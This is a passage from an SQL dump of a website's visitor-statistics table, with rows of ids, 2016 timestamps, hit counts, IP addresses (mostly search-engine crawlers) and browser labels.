,1471175832,1,1,0,0,'164.132.161.58','other'),(56085,1471175862,1,1,0,0,'164.132.161.39','other'),(56086,1471176316,1,1,0,0,'51.255.65.70','other'),(56087,1471177844,1,1,0,0,'208.115.113.82','other'),(56088,1471178300,1,1,0,0,'51.255.65.19','other'),(56089,1471178746,1,1,0,0,'51.255.65.31','other'),(56090,1471179514,1,1,0,0,'51.255.65.9','other'),(56091,1471179541,1,1,0,0,'164.132.161.29','other'),(56092,1471179584,1,1,0,0,'51.255.65.22','other'),(56093,1471179638,1,1,0,0,'180.76.15.135','other'),(56094,1471179936,1,0,1,0,'66.249.66.182',''),(56095,1471180401,1,1,0,0,'51.255.162.164','other'),(56096,1471181068,1,1,0,0,'164.132.161.18','other'),(56097,1471181825,1,1,0,0,'51.255.65.4','other'),(56098,1471182054,1,1,0,0,'157.55.39.63','other'),(56099,1471182824,1,1,0,0,'207.46.13.9','other'),(56100,1471185241,1,1,0,0,'51.255.65.36','other'),(56101,1471185471,1,1,0,0,'157.55.39.249','other'),(56102,1471187113,1,1,0,0,'164.132.161.44','other'),(56103,1471187341,1,1,0,0,'164.132.161.13','other'),(56104,1471187403,1,1,0,0,'151.80.31.167','other'),(56105,1471187914,1,1,0,0,'188.239.91.233','chrome'),(56106,1471188265,1,1,0,0,'180.76.15.11','other'),(56107,1471189272,1,1,0,0,'151.80.31.184','other'),(56108,1471189639,1,0,1,0,'66.249.66.182',''),(56109,1471190075,1,1,0,0,'51.255.65.95','other'),(56110,1471190199,2,0,2,0,'66.249.66.188',''),(56111,1471190313,1,1,0,0,'151.80.31.155','other'),(56112,1471190496,1,1,0,0,'164.132.161.33','other'),(56113,1471190667,1,1,0,0,'151.80.31.166','other'),(56114,1471190681,1,1,0,0,'51.255.65.68','other'),(56115,1471190914,1,1,0,0,'91.196.178.103','chrome'),(56116,1471190977,1,1,0,0,'51.255.65.76','other'),(56117,1471191219,1,1,0,0,'51.255.65.64','other'),(56118,1471191388,1,1,0,0,'151.80.31.103','other'),(56119,1471191541,1,1,0,0,'51.255.65.63','other'),(56120,1471191732,1,0,1,0,'66.249.66.185',''),(56121,1471191990,1,1,0,0,'66.249.66.182','chrome'),(56122,1471192095,1,1,0,0,'91.196.178.103','chrome'),(56123,1471192581,1,1,0,0,'164.132.161.62','other'),(56124,1471192588,1,1,0,0,'46.211.70.104','chrome'),(56125,1471193349,1,1,0,0,'208.115.113.82','other'),(56126,1471193578,1,1,0,0,'164.132.161.95','other'),(56127,1471195507,1,1,0,0,'51.255.65.26','other'),(56128,1471195814,1,1,0,0,'164.132.161.23','other'),(56129,1471196483,1,0,1,0,'66.249.79.167',''),(56130,1471197256,1,1,0,0,'164.132.161.15','other'),(56131,1471197406,1,1,0,0,'51.255.65.23','other'),(56132,1471198776,1,0,1,0,'66.249.79.179',''),(56133,1471198800,1,1,0,0,'151.80.31.159','other'),(56134,1471198940,1,1,0,0,'164.132.161.94','other'),(56135,1471198941,1,1,0,0,'157.55.39.249','other'),(56136,1471198985,1,1,0,0,'51.255.65.2','other'),(56137,1471199186,1,0,1,0,'66.249.79.176',''),(56138,1471199388,1,1,0,0,'208.115.113.82','other'),(56139,1471199617,1,1,0,0,'91.196.178.70','chrome'),(56141,1471200038,1,1,0,0,'188.163.69.61','chrome'),(56142,1471201093,1,1,0,0,'94.179.45.108','chrome'),(56143,1471201332,1,1,0,0,'51.255.65.14','other'),(56144,1471201724,1,0,1,0,'66.249.79.163',''),(56145,1471203864,1,1,0,0,'51.255.65.73','other'),(56146,1471203883,1,1,0,0,'51.255.65.86','other'),(56147,1471203956,1,1,0,0,'164.132.161.52','other'),(56148,1471204370,1,1,0,0,'51.255.65.91','other'),(56149,1471205282,1,1,0,0,'164.132.161.73','other'),(56150,1471205961,1,1,0,0,'164.132.161.77','other'),(56151,1471206656,1,1,0,0,'51.255.65.71','other'),(56152,1471206956,1,1,0,0,'51.255.65.61','other'),(56153,1471210485,1,1,0,0,'208.115.113.92','other'),(56154,1471210922,1,1,0,0,'164.132.161.8','other'),(56155,1471211395,1,1,0,0,'164.132.161.15','other'),(56156,1471211611,1,1,0,0,'164.132.161.76','other'),(56157,1471212086,1,1,0,0,'157.55.39.249','other'),(56158,1471214030,1,1,0,0,'164.132.161.57','other'),(56159,1471214287,1,1,0,0,'164.132.161.36','other'),(56160,1471214479,1,1,0,0,'51.255.65.35','other'),(56161,1471215092,1,1,0,0,'164.132.161.39','other'),(56162,1471215592,1,0,1,0,'66.249.79.179',''),(56163,1471215695,1,1,0,0,'164.132.161.35','other'),(56164,1471216366,1,1,0,0,'130.193.51.19','other'),(56165,1471216901,1,1,0,0,'151.80.31.105','other'),(56166,1471216967,1,1,0,0,'51.255.65.38','other'),(56167,1471217412,1,1,0,0,'164.132.161.38','other'),(56168,1471217494,1,1,0,0,'164.132.161.37','other'),(56169,1471217764,1,0,1,0,'66.249.79.176',''),(56170,1471217985,1,1,0,0,'151.80.31.167','other'),(56171,1471218702,1,1,0,0,'164.132.161.49','other'),(56172,1471219288,1,0,1,0,'66.249.79.176',''),(56173,1471219794,1,1,0,0,'164.132.161.14','other'),(56174,1471219915,58,58,0,0,'208.43.225.84','other'),(56175,1471220202,1,1,0,0,'208.43.225.85','other'),(56176,1471220426,1,1,0,0,'51.255.65.33','other'),(56177,1471220703,1,0,1,0,'66.249.79.182',''),(56178,1471221060,1,1,0,0,'51.255.65.20','other'),(56179,1471221123,1,1,0,0,'164.132.161.60','other'),(56180,1471221420,1,1,0,0,'130.193.51.19','other'),(56181,1471221507,4,4,0,0,'141.8.183.25','other'),(56182,1471221996,1,1,0,0,'208.115.113.92','other'),(56183,1471222072,1,0,1,0,'66.249.79.182',''),(56184,1471222326,1,1,0,0,'151.80.31.163','other'),(56185,1471223191,1,1,0,0,'141.8.142.58','other'),(56186,1471223318,1,1,0,0,'164.132.161.21','other'),(56187,1471223466,1,1,0,0,'151.80.31.173','other'),(56188,1471223973,1,1,0,0,'207.46.13.9','other'),(56189,1471224109,2,2,0,0,'51.254.121.184','other'),(56190,1471224225,1,1,0,0,'208.115.113.92','other'),(56191,1471224383,1,1,0,0,'141.8.183.25','other'),(56192,1471225457,1,1,0,0,'40.77.167.38','other'),(56193,1471225999,1,0,1,0,'66.249.79.182',''),(56194,1471226058,1,1,0,0,'66.249.79.167','chrome'),(56195,1471227362,1,0,1,0,'66.249.79.167',''),(56196,1471227723,1,1,0,0,'164.132.161.29','other'),(56197,1471227860,1,1,0,0,'180.76.15.141','other'),(56198,1471228028,1,1,0,0,'164.132.161.49','other'),(56199,1471228278,1,1,0,0,'51.255.65.75','other'),(56200,1471228451,2,2,0,0,'66.249.79.179','chrome'),(56201,1471228489,1,1,0,0,'164.132.161.42','other'),(56202,1471229266,1,1,0,0,'51.255.65.52','other'),(56203,1471229394,1,0,1,0,'66.249.79.182',''),(56204,1471229441,1,1,0,0,'51.255.65.11','other'),(56205,1471229525,1,0,1,0,'68.180.230.111',''),(56206,1471229790,1,1,0,0,'51.255.65.30','other'),(56207,1471230232,1,1,0,0,'51.255.65.76','other'),(56208,1471230623,1,1,0,0,'151.80.31.108','other'),(56209,1471231213,1,1,0,0,'151.80.31.179','other'),(56210,1471231456,1,1,0,0,'51.255.65.97','other'),(56211,1471231732,2,2,0,0,'141.8.183.25','other'),(56212,1471231988,1,1,0,0,'51.255.65.28','other'),(56213,1471232209,1,1,0,0,'40.77.167.38','other'),(56214,1471232585,1,1,0,0,'151.80.31.101','other'),(56215,1471232902,1,1,0,0,'151.80.31.174','other'),(56216,1471232934,1,0,1,0,'66.249.79.179',''),(56217,1471233102,1,1,0,0,'66.249.79.182','chrome'),(56218,1471233800,1,1,0,0,'151.80.31.179','other'),(56219,1471233852,1,1,0,0,'91.196.178.129','chrome'),(56220,1471233953,1,1,0,0,'164.132.161.61','other'),(56221,1471234430,1,1,0,0,'51.255.65.37','other'),(56222,1471235025,1,1,0,0,'164.132.161.82','other'),(56223,1471235438,1,1,0,0,'157.55.39.34','other'),(56224,1471235464,1,1,0,0,'151.80.31.179','other'),(56225,1471235494,1,1,0,0,'174.129.237.157','other'),(56226,1471235707,1,0,1,0,'66.249.79.176',''),(56227,1471237080,1,1,0,0,'51.255.65.10','other'),(56228,1471237143,1,1,0,0,'66.249.79.182','chrome'),(56229,1471237308,1,1,0,0,'164.132.161.32','other'),(56230,1471238060,1,1,0,0,'91.244.13.85','chrome'),(56231,1471238151,1,1,0,0,'130.193.50.34','other'),(56232,1471238261,2,2,0,0,'141.8.183.25','other'),(56233,1471238297,1,1,0,0,'130.193.51.19','other'),(56234,1471238608,1,1,0,0,'157.55.39.63','other'),(56235,1471239227,1,0,1,0,'66.249.79.159',''),(56236,1471239930,1,1,0,0,'51.255.65.89','other'),(56237,1471239964,21,21,0,0,'46.4.123.172','other'),(56238,1471240110,1,1,0,0,'51.255.65.50','other'),(56239,1471240225,1,1,0,0,'178.92.59.35','chrome'),(56240,1471240292,1,1,0,0,'91.196.178.68','chrome'),(56241,1471240624,3,3,0,0,'40.77.167.38','other'),(56242,1471240708,1,1,0,0,'66.249.93.113','chrome'),(56243,1471241008,1,1,0,0,'194.44.134.10','chrome'),(56244,1471241167,1,1,0,0,'78.111.189.137','chrome'),(56245,1471241746,1,1,0,0,'151.80.31.173','other'),(56246,1471241754,1,1,0,0,'164.132.161.79','other'),(56247,1471242225,1,0,1,0,'66.249.79.176',''),(56248,1471242274,1,1,0,0,'8.37.230.4','other'),(56249,1471242321,1,1,0,0,'37.55.25.45','other'),(56250,1471242900,1,1,0,0,'151.80.31.160','other'),(56251,1471243028,1,1,0,0,'51.255.65.37','other'),(56252,1471243947,1,1,0,0,'151.80.31.181','other'),(56253,1471244355,1,1,0,0,'37.53.89.22','chrome'),(56254,1471245040,1,1,0,0,'151.80.31.156','other'),(56255,1471245227,1,1,0,0,'151.80.31.180','other'),(56256,1471245556,1,0,1,0,'66.249.79.167',''),(56257,1471245694,1,1,0,0,'164.132.161.39','other'),(56258,1471245734,1,1,0,0,'216.145.11.94','firefox'),(56259,1471246111,1,1,0,0,'51.255.65.89','other'),(56260,1471246127,1,1,0,0,'151.80.31.155','other'),(56261,1471246242,1,1,0,0,'51.255.65.32','other'),(56262,1471246470,1,1,0,0,'164.132.161.28','other'),(56263,1471246471,1,1,0,0,'151.80.31.179','other'),(56264,1471246491,1,1,0,0,'164.132.161.31','other'),(56265,1471247606,1,1,0,0,'40.77.167.38','other'),(56266,1471248116,1,0,1,0,'66.249.79.179',''),(56267,1471248205,1,1,0,0,'46.201.175.200','firefox'),(56268,1471248365,1,1,0,0,'91.196.179.33','chrome'),(56269,1471248526,1,1,0,0,'51.255.65.80','other'),(56270,1471249518,1,1,0,0,'91.196.178.67','firefox'),(56271,1471249863,1,1,0,0,'91.239.241.10','msie'),(56272,1471250421,1,1,0,0,'91.124.128.203','chrome'),(56273,1471250598,2,1,1,0,'62.210.83.88',''),(56274,1471250636,1,1,0,0,'82.207.91.234','firefox'),(56275,1471250965,1,0,1,0,'66.249.79.179',''),(56276,1471251602,1,1,0,0,'51.255.65.43','other'),(56277,1471252395,1,1,0,0,'157.55.39.63','other'),(56278,1471252580,1,1,0,0,'51.255.65.85','other'),(56279,1471252927,1,0,1,0,'66.249.79.179',''),(56280,1471253073,1,1,0,0,'91.196.178.68','other'),(56281,1471253188,1,1,0,0,'174.129.237.157','other'),(56282,1471254417,1,1,0,0,'130.180.220.203','chrome'),(56283,1471254521,1,1,0,0,'164.132.161.63','other'),(56284,1471254608,1,1,0,0,'95.132.11.102','chrome'),(56285,1471254619,2,2,0,0,'130.193.50.34','other'),(56286,1471254781,1,0,1,0,'66.249.79.159',''),(56287,1471254800,1,1,0,0,'207.46.13.9','other'),(56288,1471255060,1,1,0,0,'218.234.112.63','firefox'),(56289,1471255088,1,1,0,0,'164.132.161.84','other'),(56290,1471255116,1,1,0,0,'91.196.178.70','firefox'),(56291,1471255141,1,1,0,0,'178.154.189.37','other'),(56292,1471255300,1,1,0,0,'37.54.17.86','chrome'),(56293,1471255675,1,1,0,0,'51.255.65.37','other'),(56294,1471255850,1,1,0,0,'91.196.178.69','firefox'),(56295,1471256254,1,1,0,0,'164.132.161.63','other'),(56296,1471256846,1,1,0,0,'91.196.176.13','chrome'),(56297,1471257169,1,1,0,0,'164.132.161.72','other'),(56298,1471257325,1,1,0,0,'91.196.178.161','chrome'),(56299,1471257376,1,1,0,0,'164.132.161.62','other'),(56300,1471257638,1,0,1,0,'66.249.79.179',''),(56301,1471257736,1,1,0,0,'151.80.31.160','other'),(56302,1471257849,1,1,0,0,'94.179.122.240','chrome'),(56303,1471258028,1,1,0,0,'91.196.178.104','chrome'),(56304,1471258343,1,1,0,0,'141.8.183.25','other'),(56305,1471258508,1,1,0,0,'164.132.161.58','other'),(56306,1471258750,1,1,0,0,'37.54.17.86','chrome'),(56307,1471260795,1,1,0,0,'66.249.79.179','chrome'),(56308,1471262178,1,0,1,0,'66.249.79.176',''),(56309,1471262632,1,1,0,0,'66.102.9.93','chrome'),(56310,1471263645,1,1,0,0,'91.196.178.132','firefox'),(56311,1471264077,2,1,1,0,'66.249.79.179',''),(56312,1471264159,1,1,0,0,'180.76.15.16','other'),(56313,1471264778,1,1,0,0,'130.193.51.19','other'),(56314,1471264787,1,1,0,0,'141.8.142.61','other'),(56315,1471264863,1,1,0,0,'141.8.142.67','other'),(56316,1471264989,1,1,0,0,'130.193.50.34','other'),(56317,1471265738,1,1,0,0,'164.132.161.56','other'),(56318,1471265812,1,1,0,0,'164.132.161.41','other'),(56319,1471266224,1,0,1,0,'66.249.79.182',''),(56320,1471266904,1,1,0,0,'91.196.178.68','chrome'),(56321,1471266919,1,1,0,0,'109.87.170.227','chrome'),(56322,1471268259,1,1,0,0,'164.132.161.83','other'),(56323,1471268295,6,6,0,0,'141.8.183.25','other'),(56324,1471268454,6,6,0,0,'130.193.50.34','other'),(56325,1471268558,1,1,0,0,'91.196.178.38','firefox'),(56326,1471268675,1,1,0,0,'91.244.13.85','chrome'),(56327,1471268985,1,1,0,0,'164.132.161.84','other'),(56328,1471268987,1,1,0,0,'164.132.161.19','other'),(56329,1471269035,1,1,0,0,'164.132.161.63','other'),(56330,1471269081,1,1,0,0,'130.193.51.19','other'),(56331,1471269088,1,1,0,0,'46.201.175.200','firefox'),(56332,1471269164,1,0,1,0,'66.249.79.179',''),(56333,1471269355,2,2,0,0,'130.193.50.34','other'),(56334,1471269447,2,2,0,0,'141.8.183.25','other'),(56335,1471269759,1,1,0,0,'141.8.142.61','other'),(56336,1471269763,1,1,0,0,'130.193.51.14','other'),(56337,1471269917,1,1,0,0,'141.8.132.10','other'),(56338,1471270081,1,1,0,0,'141.8.142.58','other'),(56339,1471270226,1,1,0,0,'141.8.142.85','other'),(56340,1471270357,1,1,0,0,'93.158.152.61','other'),(56341,1471270458,1,1,0,0,'151.80.31.183','other'),(56342,1471270492,2,1,1,0,'66.249.79.176',''),(56343,1471270495,1,1,0,0,'46.201.175.200','firefox'),(56344,1471270508,3,3,0,0,'130.193.50.34','other'),(56345,1471270634,1,1,0,0,'93.158.152.40','other'),(56346,1471270760,1,1,0,0,'141.8.183.25','other'),(56347,1471271076,1,1,0,0,'164.132.161.5','other'),(56348,1471271141,1,1,0,0,'130.193.50.4','other'),(56349,1471271414,1,1,0,0,'91.244.13.85','chrome'),(56350,1471271893,1,1,0,0,'164.132.161.25','other'),(56351,1471271912,1,1,0,0,'51.255.65.70','other'),(56352,1471272080,1,1,0,0,'91.244.13.224','chrome'),(56353,1471272385,1,1,0,0,'164.132.161.18','other'),(56354,1471272405,1,1,0,0,'164.132.161.15','other'),(56355,1471272597,1,1,0,0,'195.234.6.11','chrome'),(56356,1471272612,1,1,0,0,'141.8.183.25','other'),(56357,1471272743,1,1,0,0,'51.255.65.2','other'),(56358,1471273265,1,0,1,0,'66.249.79.182',''),(56359,1471273300,1,1,0,0,'157.55.39.34','other'),(56360,1471273877,1,1,0,0,'141.8.183.25','other'),(56361,1471274422,1,1,0,0,'51.255.65.34','other'),(56362,1471274593,1,1,0,0,'51.255.65.38','other'),(56363,1471274707,1,1,0,0,'51.255.65.92','other'),(56364,1471275674,1,1,0,0,'130.193.51.19','other'),(56365,1471275675,1,1,0,0,'141.8.142.58','other'),(56366,1471276547,1,1,0,0,'164.132.161.97','other'),(56367,1471277156,1,1,0,0,'164.132.161.25','other'),(56368,1471277894,1,1,0,0,'51.255.65.30','other'),(56369,1471278746,1,1,0,0,'5.45.201.175','other'),(56370,1471278747,1,1,0,0,'5.255.253.47','other'),(56371,1471278749,1,1,0,0,'141.8.142.62','other'),(56372,1471278829,1,1,0,0,'207.46.13.9','other'),(56373,1471279302,2,2,0,0,'130.193.50.34','other'),(56374,1471279433,1,1,0,0,'130.193.51.19','other'),(56375,1471279628,1,1,0,0,'51.255.65.42','other'),(56376,1471279717,2,2,0,0,'141.8.183.25','other'),(56378,1471279809,1,1,0,0,'164.132.161.44','other'),(56379,1471280028,1,0,1,0,'66.249.79.176',''),(56380,1471280264,1,0,1,0,'66.249.79.179',''),(56381,1471280459,1,1,0,0,'130.193.50.34','other'),(56382,1471280585,1,1,0,0,'178.154.149.10','other'),(56383,1471280809,1,1,0,0,'164.132.161.91','other'),(56384,1471280928,1,0,1,0,'66.249.79.163',''),(56385,1471281255,1,1,0,0,'51.255.65.30','other'),(56386,1471281579,1,1,0,0,'164.132.161.25','other'),(56387,1471281879,1,1,0,0,'151.80.31.101','other'),(56388,1471282237,1,1,0,0,'51.255.65.67','other'),(56389,1471282580,1,1,0,0,'151.80.31.166','other'),(56390,1471282642,1,1,0,0,'217.20.168.185','chrome'),(56391,1471282673,1,1,0,0,'130.193.51.74','other'),(56392,1471282765,1,1,0,0,'151.80.31.105','other'),(56393,1471282823,1,1,0,0,'46.200.209.167','other'),(56394,1471283165,1,1,0,0,'164.132.161.96','other'),(56395,1471283168,1,1,0,0,'178.154.189.31','other'),(56396,1471283171,1,1,0,0,'157.55.39.34','other'),(56397,1471283308,1,1,0,0,'40.77.167.38','other'),(56398,1471283371,1,1,0,0,'164.132.161.61','other'),(56399,1471283800,1,0,1,0,'66.249.65.185',''),(56400,1471283881,1,1,0,0,'151.80.31.169','other'),(56401,1471284013,1,1,0,0,'130.193.50.4','other'),(56402,1471284233,1,1,0,0,'164.132.161.14','other'),(56403,1471284278,1,1,0,0,'141.8.132.41','other'),(56404,1471284410,1,1,0,0,'130.193.50.38','other'),(56405,1471284545,1,1,0,0,'141.8.183.25','other'),(56406,1471284754,1,1,0,0,'164.132.161.53','other'),(56407,1471284793,1,1,0,0,'157.55.39.34','other'),(56408,1471284828,1,1,0,0,'130.193.51.19','other'),(56409,1471284996,1,1,0,0,'51.255.65.30','other'),(56410,1471285010,1,1,0,0,'130.193.50.34','other'),(56411,1471285215,1,0,1,0,'66.249.65.183',''),(56412,1471285299,1,1,0,0,'51.255.65.92','other'),(56413,1471285845,3,0,3,0,'66.249.65.188',''),(56414,1471285976,1,1,0,0,'164.132.161.27','other'),(56415,1471286334,1,1,0,0,'164.132.161.84','other'),(56416,1471286339,1,1,0,0,'51.255.65.3','other'),(56417,1471287031,1,0,1,0,'66.249.65.182',''),(56418,1471287055,1,1,0,0,'141.8.183.25','other'),(56419,1471287075,1,0,1,0,'66.249.65.188',''),(56420,1471287170,1,1,0,0,'164.132.161.92','other'),(56421,1471287223,1,1,0,0,'178.154.189.31','other'),(56422,1471287225,1,1,0,0,'130.193.50.6','other'),(56423,1471287254,1,1,0,0,'157.55.39.34','other'),(56424,1471287392,1,1,0,0,'141.8.142.85','other'),(56425,1471288644,1,1,0,0,'51.255.65.80','other'),(56426,1471289122,1,1,0,0,'130.193.50.34','other'),(56427,1471289248,1,1,0,0,'130.193.51.19','other'),(56428,1471289600,1,1,0,0,'51.255.65.77','other'),(56429,1471290112,1,0,1,0,'66.249.65.177',''),(56430,1471290694,1,0,1,0,'66.249.65.182',''),(56431,1471290756,2,2,0,0,'46.165.197.141','other'),(56432,1471290795,1,0,1,0,'66.249.65.185',''),(56433,1471290979,32,32,0,0,'203.77.76.152','other'),(56434,1471291584,1,0,1,0,'66.249.65.188',''),(56435,1471291696,1,1,0,0,'91.196.178.66','chrome'),(56436,1471291892,1,1,0,0,'141.8.183.25','other'),(56437,1471292014,1,0,1,0,'66.249.65.185',''),(56438,1471292232,1,1,0,0,'66.249.65.182','chrome'),(56439,1471292504,1,1,0,0,'164.132.161.80','other'),(56440,1471292829,2,2,0,0,'141.8.142.61','other'),(56441,1471292940,1,0,1,0,'66.249.65.185',''),(56442,1471292953,1,1,0,0,'141.8.132.10','other'),(56443,1471293017,3,3,0,0,'130.193.50.34','other'),(56444,1471293086,1,1,0,0,'141.8.183.25','other'),(56445,1471293585,1,1,0,0,'130.193.51.14','other'),(56446,1471294642,1,1,0,0,'151.80.31.162','other'),(56447,1471294656,1,1,0,0,'66.249.65.182','chrome'),(56448,1471294811,1,1,0,0,'151.80.31.109','other'),(56449,1471295895,2,0,2,0,'66.249.65.185',''),(56450,1471296530,1,1,0,0,'157.55.39.34','other'),(56451,1471297616,1,0,1,0,'66.249.65.182',''),(56452,1471297762,1,1,0,0,'151.80.31.164','other'),(56453,1471297949,1,0,1,0,'66.249.65.188',''),(56454,1471297986,1,0,1,0,'66.249.65.177',''),(56455,1471298077,1,1,0,0,'51.255.65.55','other'),(56456,1471299140,1,0,1,0,'66.249.65.188',''),(56457,1471299345,1,1,0,0,'164.132.161.16','other'),(56458,1471299990,1,0,1,0,'66.249.65.182',''),(56459,1471300226,1,1,0,0,'180.76.15.17','other'),(56460,1471300494,1,1,0,0,'51.255.65.26','other'),(56461,1471300835,1,1,0,0,'164.132.161.71','other'),(56462,1471300842,1,1,0,0,'157.55.39.63','other'),(56463,1471300847,1,1,0,0,'51.255.65.31','other'),(56464,1471300850,1,1,0,0,'157.55.39.34','other'),(56465,1471300942,1,1,0,0,'164.132.161.68','other'),(56466,1471301936,1,1,0,0,'51.255.65.44','other'),(56467,1471302627,1,0,1,0,'66.249.65.177',''),(56468,1471303299,1,1,0,0,'180.76.15.16','other'),(56469,1471303443,1,1,0,0,'51.255.65.65','other'),(56470,1471303661,1,0,1,0,'66.249.65.188',''),(56471,1471303692,1,0,1,0,'66.249.65.183',''),(56472,1471303733,1,1,0,0,'164.132.161.38','other'),(56473,1471306339,1,1,0,0,'207.46.13.128','other'),(56474,1471306577,1,0,1,0,'66.249.65.188',''),(56475,1471308232,1,1,0,0,'151.80.31.155','other'),(56476,1471308391,1,1,0,0,'141.8.183.25','other'),(56477,1471308393,1,1,0,0,'141.8.142.61','other'),(56478,1471309062,1,1,0,0,'207.46.13.128','other'),(56479,1471309674,1,1,0,0,'164.132.161.73','other'),(56480,1471309766,1,1,0,0,'164.132.161.74','other'),(56481,1471310754,1,0,1,0,'66.249.65.188',''),(56482,1471311121,1,0,1,0,'66.249.65.180',''),(56483,1471311628,1,1,0,0,'130.193.37.27','other'),(56484,1471311630,1,1,0,0,'93.158.152.84','other'),(56485,1471312147,1,0,1,0,'66.249.65.185',''),(56486,1471312278,1,1,0,0,'178.154.149.11','other'),(56487,1471313233,1,1,0,0,'164.132.161.79','other'),(56488,1471313530,1,1,0,0,'5.255.253.36','other'),(56489,1471314057,1,1,0,0,'164.132.161.71','other'),(56490,1471314090,1,1,0,0,'151.80.31.175','other'),(56491,1471315249,1,1,0,0,'208.90.57.196','firefox'),(56492,1471315415,1,1,0,0,'51.255.65.84','other'),(56493,1471315530,1,1,0,0,'176.77.52.7','chrome'),(56494,1471315532,1,1,0,0,'188.255.15.51','firefox'),(56495,1471315568,1,1,0,0,'176.14.197.196','opera'),(56496,1471316117,1,1,0,0,'66.249.65.180','chrome'),(56497,1471316165,1,1,0,0,'208.90.57.196','firefox'),(56498,1471316419,1,0,1,0,'66.249.65.188',''),(56499,1471316784,1,1,0,0,'51.255.65.62','other'),(56500,1471317186,1,1,0,0,'51.255.65.68','other'),(56501,1471317354,1,1,0,0,'164.132.161.34','other'),(56502,1471317474,1,1,0,0,'51.255.65.97','other'),(56503,1471317914,1,1,0,0,'141.8.132.2','other'),(56504,1471317919,1,1,0,0,'141.8.184.22','other'),(56505,1471317920,1,1,0,0,'130.193.37.27','other'),(56506,1471318449,1,1,0,0,'66.249.65.188','chrome'),(56507,1471318758,1,1,0,0,'207.46.13.128','other'),(56508,1471320139,1,0,1,0,'66.249.65.188',''),(56509,1471320663,1,0,1,0,'66.249.65.185',''),(56510,1471320696,1,1,0,0,'130.193.51.74','other'),(56511,1471320778,1,0,1,0,'66.249.65.182',''),(56512,1471321231,2,0,2,0,'66.249.65.188',''),(56513,1471321416,1,1,0,0,'151.80.31.158','other'),(56514,1471321950,1,1,0,0,'164.132.161.91','other'),(56515,1471321968,2,0,2,0,'66.249.65.185',''),(56516,1471322540,1,1,0,0,'51.255.65.78','other'),(56517,1471323214,1,0,1,0,'66.249.65.183',''),(56518,1471323240,1,0,1,0,'66.249.65.185',''),(56519,1471323317,1,1,0,0,'66.249.93.109','chrome'),(56520,1471323356,1,0,1,0,'66.249.65.182',''),(56521,1471323587,1,1,0,0,'151.80.31.101','other'),(56522,1471323982,1,0,1,0,'66.249.65.180',''),(56523,1471324427,1,0,1,0,'66.249.65.185',''),(56524,1471324614,1,1,0,0,'93.158.152.46','other'),(56525,1471324804,1,1,0,0,'193.107.108.161','msie'),(56526,1471325237,1,0,1,0,'66.249.65.188',''),(56527,1471325620,1,1,0,0,'130.193.51.19','other'),(56528,1471325736,1,1,0,0,'91.196.178.72','chrome'),(56529,1471326695,1,1,0,0,'164.132.161.94','other'),(56530,1471327008,1,1,0,0,'1.22.145.110','firefox'),(56531,1471327515,1,1,0,0,'164.132.161.64','other'),(56532,1471327811,1,1,0,0,'92.113.189.52','firefox'),(56533,1471327877,1,1,0,0,'176.102.195.10','firefox'),(56534,1471328054,1,1,0,0,'31.41.70.10','opera'),(56535,1471328088,1,0,1,0,'66.249.65.185',''),(56536,1471328638,1,1,0,0,'193.107.108.161','msie'),(56537,1471328926,1,0,1,0,'66.249.65.177',''),(56538,1471329143,1,1,0,0,'164.132.161.44','other'),(56539,1471329192,1,1,0,0,'178.95.244.121','firefox'),(56540,1471329913,2,0,2,0,'66.249.65.188',''),(56541,1471329973,1,1,0,0,'151.80.31.156','other'),(56542,1471329995,1,1,0,0,'151.80.31.102','other'),(56543,1471330134,1,1,0,0,'151.80.31.180','other'),(56544,1471330342,1,0,1,0,'66.249.65.183',''),(56545,1471330480,1,0,1,0,'66.249.65.182',''),(56546,1471330844,1,0,1,0,'66.249.65.188',''),(56547,1471331898,1,1,0,0,'164.132.161.81','other'),(56548,1471332376,1,1,0,0,'164.132.161.28','other'),(56549,1471332487,1,1,0,0,'164.132.161.7','other'),(56550,1471332491,1,1,0,0,'51.255.65.60','other'),(56551,1471332553,1,0,1,0,'66.249.65.185',''),(56552,1471333040,1,1,0,0,'51.255.65.14','other'),(56553,1471333152,1,1,0,0,'51.255.65.97','other'),(56554,1471333159,1,1,0,0,'94.178.12.90','firefox'),(56555,1471333168,1,1,0,0,'130.193.51.19','other'),(56556,1471333564,1,1,0,0,'91.196.178.69','firefox'),(56557,1471333635,1,1,0,0,'207.46.13.9','other'),(56558,1471333820,1,1,0,0,'193.107.108.161','msie'),(56559,1471334274,1,1,0,0,'93.73.234.193','firefox'),(56560,1471334287,1,1,0,0,'37.53.89.22','chrome'),(56561,1471334346,1,1,0,0,'66.249.65.188','chrome'),(56562,1471334410,1,0,1,0,'66.249.65.182',''),(56563,1471334833,1,1,0,0,'178.95.244.121','firefox'),(56564,1471335114,1,1,0,0,'91.196.178.166','chrome'),(56565,1471335279,1,1,0,0,'51.255.65.81','other'),(56566,1471335611,1,1,0,0,'151.80.31.100','other'),(56567,1471335956,1,1,0,0,'178.95.244.121','firefox'),(56568,1471336212,1,1,0,0,'51.255.65.71','other'),(56569,1471336383,1,1,0,0,'164.132.161.73','other'),(56570,1471336434,1,0,1,0,'66.249.65.183',''),(56571,1471336445,1,1,0,0,'207.46.13.128','other'),(56572,1471336865,1,0,1,0,'66.249.65.182',''),(56573,1471336869,1,1,0,0,'178.95.244.121','firefox'),(56574,1471337246,1,1,0,0,'151.80.31.183','other'),(56575,1471337943,1,1,0,0,'92.113.189.52','firefox'),(56576,1471338367,1,1,0,0,'178.95.244.121','firefox'),(56577,1471338743,2,0,2,0,'66.249.65.185',''),(56578,1471338769,2,0,2,0,'66.249.65.182',''),(56579,1471339362,1,1,0,0,'178.95.244.121','firefox'),(56580,1471339596,1,1,0,0,'92.113.189.52','firefox'),(56581,1471339740,1,0,1,0,'66.249.65.183',''),(56582,1471340302,1,1,0,0,'194.146.139.211','chrome'),(56583,1471340769,1,1,0,0,'66.249.65.182','chrome'),(56584,1471340813,1,1,0,0,'178.95.244.121','firefox'),(56585,1471341276,1,1,0,0,'91.196.178.69','firefox'),(56586,1471341668,1,1,0,0,'51.255.65.70','other'),(56587,1471341748,1,0,1,0,'66.249.65.188',''),(56588,1471342029,1,1,0,0,'130.193.50.38','other'),(56589,1471342271,1,1,0,0,'51.255.65.8','other'),(56590,1471342461,1,1,0,0,'91.196.178.67','firefox'),(56591,1471342482,1,1,0,0,'91.196.178.166','chrome'),(56592,1471342487,1,1,0,0,'91.196.178.69','firefox'),(56593,1471342932,1,1,0,0,'51.255.65.94','other'),(56594,1471342968,2,0,2,0,'66.249.65.185',''),(56595,1471343070,1,1,0,0,'164.132.161.36','other'),(56596,1471343337,1,1,0,0,'51.255.65.57','other'),(56597,1471343387,2,0,2,0,'66.249.65.182',''),(56598,1471344013,1,1,0,0,'176.122.98.164','opera'),(56599,1471344030,1,1,0,0,'51.255.65.32','other'),(56600,1471344803,